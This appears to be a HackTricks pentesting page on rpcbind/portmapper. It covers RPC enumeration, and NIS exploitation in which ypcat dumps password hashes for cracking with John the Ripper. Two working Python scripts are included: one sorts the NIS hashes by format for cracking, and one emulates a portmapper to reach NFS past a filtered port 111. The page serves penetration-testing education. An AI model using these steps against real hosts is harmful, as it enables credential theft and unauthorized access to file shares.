hacktricks/network-services-pentesting/pentesting-rpcbind.md
2024-02-11 02:13:58 +00:00

# 111/TCP/UDP - Pentesting Portmapper
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
## Basic Information
**Portmapper** (rpcbind) is the service that maps **RPC** (Remote Procedure Call) program numbers to the ports on which the corresponding services are listening. It is a core component of **Unix-like systems** and a prerequisite for RPC-based services such as **NFS (Network File System)**, **NIS (Network Information Service)**, rusersd and others, since a client asks the portmapper which port to use before talking to the actual service. The **port** associated with **Portmapper** is frequently scanned by attackers because a single unauthenticated query returns every registered RPC program, which reveals which services are exposed on the host and gives hints about the **Unix operating system (OS)** in use.
**Default port:** 111/TCP/UDP, 32771 on Oracle Solaris
```
PORT STATE SERVICE
111/tcp open rpcbind
```
## Enumeration
rpcbind is the network service used on Unix and Linux systems to register and manage RPC (Remote Procedure Call) services. It listens on port 111 and lets any client, without authentication, request the list of RPC programs registered on the host together with their versions, transports and ports.
To start enumerating rpcbind you can use the following command:
```plaintext
rpcinfo -p <target>
```
This command lists the RPC services registered on the host. Each entry is a program number, version, protocol (tcp/udp), port and service name; program numbers are resolved to names through `/etc/rpc` (for example 100003 is nfs, 100005 is mountd, 100004 is ypserv, 100002 is rusersd). Use this list to pick the services that deserve a closer look and may expose weaknesses that can be abused to gain access to the system.
```
rpcinfo irked.htb
nmap -sSUC -p111 192.168.10.1
```
Sometimes it returns no information at all; other times you will get something like this:
![](<../.gitbook/assets/image (230).png>)
### Shodan
* `port:111 portmap`
## RPCBind + NFS
If you find the NFS service registered, you will probably be able to list and download (and maybe upload) files:
![](<../.gitbook/assets/image (232).png>)
Read [2049 - Pentesting NFS Service](nfs-service-pentesting.md) to learn more about how to test this protocol.
## NIS
Exploring **NIS** weaknesses is a two-step process that starts with identifying the `ypbind` service in the rpcbind listing. The core of this exploration is discovering the **NIS domain name**: without it progress stalls, because every NIS query has to name the domain.
![](<../.gitbook/assets/image (233).png>)
The exploration begins by installing the necessary packages (`apt-get install nis`). The next step uses `ypwhich` to confirm the presence of the NIS server by pinging it with the domain name and the server's IP, which verifies that both values are correct.
The final and crucial step uses `ypcat` to extract sensitive data, particularly the user password hashes from the `passwd.byname` map. Once cracked with tools such as **John the Ripper**, these hashes reveal which accounts can be accessed and with what privileges.
```bash
# Install NIS tools
apt-get install nis
# Ping the NIS server to confirm its presence
ypwhich -d <domain-name> <server-ip>
# Extract user credentials (the passwd map carries the hash field directly)
ypcat -d <domain-name> -h <server-ip> passwd.byname
```
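Triage of the `ypcat ... passwd.byname` dump before handing it to John, as an added example that is not part of the original page: it drops entries whose password field is a placeholder (locked, shadowed or empty), works out which crypt(3) format each remaining hash uses so the right `--format` can be chosen, and groups the `user:hash` lines by format with uid 0 first. The sample map and its hash values are constructed for this example and will not crack; feed it the real dump on stdin.

```python
"""Triage `ypcat -d <domain> -h <server> passwd.byname` output for cracking.

Unlike /etc/passwd on a shadowed host, the NIS passwd map carries the hash in
field 2, so the dump can be fed to John the Ripper once placeholder entries
(locked, shadowed, empty) are dropped and the hash format is known.
"""
import re

# crypt(3) prefixes and the matching John format names; legacy DES hashes
# are 13 unprefixed characters from the crypt alphabet.
HASH_FORMATS = {
    "$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
}
DES_RE = re.compile(r"^[./0-9A-Za-z]{13}$")
PLACEHOLDERS = {"", "x", "*", "!!", "*NP*", "*LK*", "NP"}

# Constructed sample map; the hash values are made up and will not crack.
SAMPLE_MAP = """\
root:$6$Qx7Kfz9L$CONSTRUCTEDsha512cryptHASHvalue0123456789abcdefghijklmnop:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
svc_backup:$1$Hk2s0Pq1$CONSTRUCTEDmd5cryptHASH0:1001:1001:Backup service:/home/svc_backup:/bin/sh
legacy:ab01FAX.Pwk1Q:1002:1002:Old DES account:/home/legacy:/bin/bash
locked:!:1003:1003:Locked:/home/locked:/bin/false
shadowed:x:1004:1004:Shadowed:/home/shadowed:/bin/bash
"""


def classify(hash_field: str):
    """Return John's format name for a hash field, or None if it holds no hash."""
    if hash_field in PLACEHOLDERS or hash_field.startswith("!"):
        return None  # locked (!...), shadowed (x), disabled (*) or empty
    for prefix, name in HASH_FORMATS.items():
        if hash_field.startswith(prefix):
            return name
    return "descrypt" if DES_RE.match(hash_field) else "unknown"


def parse_passwd_map(text: str):
    """Return (user, hash, format, uid, shell) for every entry with a real hash."""
    out = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or line.startswith("#"):
            continue  # not a passwd(5) record
        user, pw, uid, _gid, _gecos, _home, shell = fields[:7]
        fmt = classify(pw)
        if fmt:
            out.append((user, pw, fmt, int(uid), shell))
    return out


def to_john(entries):
    """`user:hash` lines grouped by format (one --format per John run), lowest uid first."""
    by_format = {}
    for user, pw, fmt, _uid, _shell in sorted(entries, key=lambda e: e[3]):
        by_format.setdefault(fmt, []).append(f"{user}:{pw}")
    return by_format


if __name__ == "__main__":
    import sys
    text = SAMPLE_MAP if sys.stdin.isatty() else sys.stdin.read()
    for fmt, lines in to_john(parse_passwd_map(text)).items():
        print(f"# john --format={fmt} nis_{fmt}.txt")
        print("\n".join(lines))
```

Typical use is `ypcat -d <domain-name> -h <server-ip> passwd.byname | python3 nis_triage.py`; accounts that show up as `x` or `*` here are not crackable from this map and need `shadow.byname` (if the server exports it) instead.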
### NIS files
| **Master file** | **Map(s)** | **Notes** |
| ---------------- | --------------------------- | --------------------------------- |
| /etc/hosts | hosts.byname, hosts.byaddr | Contains hostnames and IP details |
| /etc/passwd | passwd.byname, passwd.byuid | NIS user password file |
| /etc/group | group.byname, group.bygid | NIS group file |
| /usr/lib/aliases | mail.aliases | Details mail aliases |
## RPC Users
If you find the **rusersd** service listed like this:
![](<../.gitbook/assets/image (231).png>)
You can enumerate the users of the box. To learn how, read [1026 - Pentesting Rusersd](1026-pentesting-rusersd.md).
## Bypassing Filtered Portmapper Port
When an **nmap scan** shows open NFS-related ports (2049 and the mountd port) while port 111 is filtered, exploiting them directly with standard tools is not straightforward, because clients such as `mount` and `showmount` first ask the portmapper where mountd and nfs are listening. However, by **emulating the portmapper on your own machine and creating a tunnel from your machine** to the target, exploitation becomes possible with standard tools: the local portmapper answers their GETPORT queries with the target's ports, and the tunnel forwards those ports to the target. This technique sidesteps the filtered state of port 111 and allows access to the NFS services. For detailed guidance on this technique, see the article at [this link](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc).
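The "emulate the portmapper locally" half of that technique, as an added example that is neither the page's nor the linked article's code: a minimal fake rpcbind that answers PMAPPROC_GETPORT and PMAPPROC_DUMP from a hard-coded table over both TCP and UDP (clients differ in which transport they query first). The table values (mountd on 20048, nfs on 2049) are constructed placeholders; fill them in from the nmap results for your target. Binding 127.0.0.1:111 needs root, and forwarding the advertised ports to the target (the tunnel step) is done separately, so after starting it `showmount -e 127.0.0.1` and `mount -t nfs 127.0.0.1:/share /mnt` go through your forwarders instead of the filtered port.

```python
"""Minimal fake portmapper (ONC RPC program 100000 v2) for the filtered-111 case.

Answers NULL, GETPORT and DUMP from a static table so that standard NFS
clients pointed at 127.0.0.1 learn the target's mountd/nfs ports, which you
then forward to the target with your tunnel of choice.
"""
import socketserver
import struct
import threading

PMAP_PROG, PMAP_VERS = 100000, 2
PMAPPROC_NULL, PMAPPROC_GETPORT, PMAPPROC_DUMP = 0, 3, 4
MSG_ACCEPTED, SUCCESS, PROG_MISMATCH, PROC_UNAVAIL = 0, 0, 2, 3

# Constructed mapping table for this example: (prog, vers, proto) -> port.
# 100003 = nfs, 100005 = mountd, 6 = TCP, 17 = UDP. Replace with nmap findings.
TABLE = {
    (100005, 3, 6): 20048, (100005, 3, 17): 20048,
    (100003, 3, 6): 2049, (100003, 4, 6): 2049, (100003, 3, 17): 2049,
}


def rpc_reply(xid: int, accept_stat: int, payload: bytes = b"") -> bytes:
    """RPC REPLY body (no record mark): MSG_ACCEPTED, AUTH_NULL verifier, accept_stat, payload."""
    return struct.pack(">IIIIII", xid, 1, MSG_ACCEPTED, 0, 0, accept_stat) + payload


def record_mark(body: bytes) -> bytes:
    """TCP framing: high bit = last fragment, low 31 bits = fragment length."""
    return struct.pack(">I", 0x80000000 | len(body)) + body


def handle_call(body: bytes, table=TABLE) -> bytes:
    """Build the reply body for one RPC CALL body (record mark already stripped)."""
    xid, mtype, rpcvers, prog, vers, proc = struct.unpack_from(">IIIIII", body, 0)
    if mtype != 0 or rpcvers != 2:
        raise ValueError("not an RPC v2 CALL")
    if prog != PMAP_PROG or vers != PMAP_VERS:
        # mismatch_info: lowest and highest version we serve
        return rpc_reply(xid, PROG_MISMATCH, struct.pack(">II", PMAP_VERS, PMAP_VERS))
    off = 24
    for _ in range(2):  # skip credential and verifier (flavor, length, padded body)
        _flavor, length = struct.unpack_from(">II", body, off)
        off += 8 + ((length + 3) & ~3)
    if proc == PMAPPROC_NULL:
        return rpc_reply(xid, SUCCESS)
    if proc == PMAPPROC_GETPORT:
        qprog, qvers, qproto, _port = struct.unpack_from(">IIII", body, off)
        port = table.get((qprog, qvers, qproto), 0)  # 0 means "not registered"
        return rpc_reply(xid, SUCCESS, struct.pack(">I", port))
    if proc == PMAPPROC_DUMP:
        payload = b"".join(struct.pack(">IIIII", 1, p, v, pr, port)
                           for (p, v, pr), port in table.items())
        return rpc_reply(xid, SUCCESS, payload + struct.pack(">I", 0))
    return rpc_reply(xid, PROC_UNAVAIL)


class TCPHandler(socketserver.StreamRequestHandler):
    def handle(self):
        while True:  # one connection may carry several record-marked calls
            mark = self.rfile.read(4)
            if len(mark) < 4:
                return
            body = self.rfile.read(struct.unpack(">I", mark)[0] & 0x7FFFFFFF)
            try:
                self.wfile.write(record_mark(handle_call(body)))
            except (ValueError, struct.error):
                return


class UDPHandler(socketserver.BaseRequestHandler):
    def handle(self):
        data, sock = self.request  # UDP: one RPC message per datagram, no record mark
        try:
            sock.sendto(handle_call(data), self.client_address)
        except (ValueError, struct.error):
            pass


if __name__ == "__main__":
    socketserver.ThreadingTCPServer.allow_reuse_address = True
    socketserver.ThreadingUDPServer.allow_reuse_address = True
    tcp = socketserver.ThreadingTCPServer(("127.0.0.1", 111), TCPHandler)
    udp = socketserver.ThreadingUDPServer(("127.0.0.1", 111), UDPHandler)
    threading.Thread(target=udp.serve_forever, daemon=True).start()
    tcp.serve_forever()
```

Check it with `rpcinfo -p 127.0.0.1` before pointing NFS clients at it: the output should be exactly the constructed table. Mappings the client asks for that are not in the table get port 0, which clients report as "program not registered", so add the mountd and nfs versions your target actually speaks.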
## Shodan
* `Portmap`
## Practice Labs
* Practice these techniques on the [**Irked HTB machine**](https://app.hackthebox.com/machines/Irked).
## HackTricks Automatic Commands
```
Protocol_Name: Portmapper #Protocol Abbreviation if there is one.
Port_Number: 111 #Comma separated if there is more than one.
Protocol_Description: PM or RPCBind #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for PortMapper
Note: |
Portmapper is a service that is utilized for mapping network service ports to RPC (Remote Procedure Call) program numbers. It acts as a critical component in Unix-based systems, facilitating the exchange of information between these systems. The port associated with Portmapper is frequently scanned by attackers as it can reveal valuable information. This information includes the type of Unix Operating System (OS) running and details about the services that are available on the system. Additionally, Portmapper is commonly used in conjunction with NFS (Network File System), NIS (Network Information Service), and other RPC-based services to manage network services effectively.
https://book.hacktricks.xyz/pentesting/pentesting-rpcbind
Entry_2:
Name: rpc info
Description: May give netstat-type info
Command: rpcinfo -p {IP}
Entry_3:
Name: nmap
Description: May give netstat-type info
Command: nmap -sSUC -p 111 {IP}
```